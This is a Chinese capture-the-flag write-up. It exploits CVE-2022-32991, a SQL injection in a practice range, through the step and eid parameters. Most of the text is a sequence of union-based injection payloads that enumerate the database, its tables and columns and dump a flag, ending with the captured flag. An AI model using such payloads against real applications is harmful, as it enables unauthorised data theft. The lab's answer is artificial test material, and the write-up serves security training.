最近新开了一个靶场,今天也去打卡签到
CVE-2022-32991编号
进入页面之后访问/register.php先进行注册
点击start之后注入点
此处可以可以直接进行sqlmap一把梭step=2&eid=60377db362694
关于源码下载地址
可以查看源码看到没有进行任何过滤的方式
首先使用order by 判断出存在5个字符
之后就是常规的操作
'and 1=2 union select 1,2,3,4,5--+
页面返回3字段中存在信息
'and 1=2 union select 1,2,database(),4,5--+
默认数据库为ctf
'and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+
可以看到存在一个flag的表,进行查看flag表中的字段
'and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+
很好!直接拖flag!
' and 1=2 union select 1,2,group_concat(flag),4,5 from flag--+
flag{2a1c735d-7a13-4d4e-8508-93874b510a49}
成功拿到flag
最后附上靶场地址